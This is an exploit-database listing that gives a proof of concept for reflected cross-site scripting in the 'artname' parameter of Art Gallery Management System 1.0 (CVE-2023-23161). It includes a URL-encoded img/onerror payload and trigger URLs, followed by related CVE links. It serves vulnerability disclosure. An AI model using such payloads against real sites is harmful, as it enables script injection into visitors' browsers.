Lucene search
Rahul PatwariPACKETSTORM:171642HistoryApr 03, 2023 - 12:00 a.m.
Art Gallery Management System Project 1.0 Cross Site Scripting
2023-04-0300:00:00
Rahul Patwari
packetstormsecurity.com
117
exploit
cross site scripting
reflected
php
cve-2023-23161
proof of concept
alert
security
0.003 Low
EPSS
Percentile
70.4%
`# Exploit Title: Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS)
# Date: 20/01/2023
# Exploit Author: Rahul Patwari
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
# Version: 1.0
# Tested on: XAMPP / Windows 10
# CVE : CVE-2023-23161
# Proof of Concept:
# 1- Install The application Art Gallery Management System Project v1.0
# 2- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=3&&artname=prints
# 3- Now Insert XSS Payload on artname parameter.
the XSS Payload: %3Cimg%20src=1%20onerror=alert(document.domain)%3E
# 4- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E
# 5- XSS has been triggered.
# Go to this url "
https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E
"
XSS will trigger.
`
Related
cve
cve
CVE-2023-23161
2023-02-10 20:15:53
zdt
zdt
prion
prion
Cross site scripting
2023-02-10 20:15:00
cvelist
cvelist
CVE-2023-23161
2023-02-10 00:00:00
nuclei
nuclei
Art Gallery Management System Project v1.0 - Cross-Site Scripting
2023-07-22 06:07:25
nvd
nvd
CVE-2023-23161
2023-02-10 20:15:53
exploitdb
exploitdb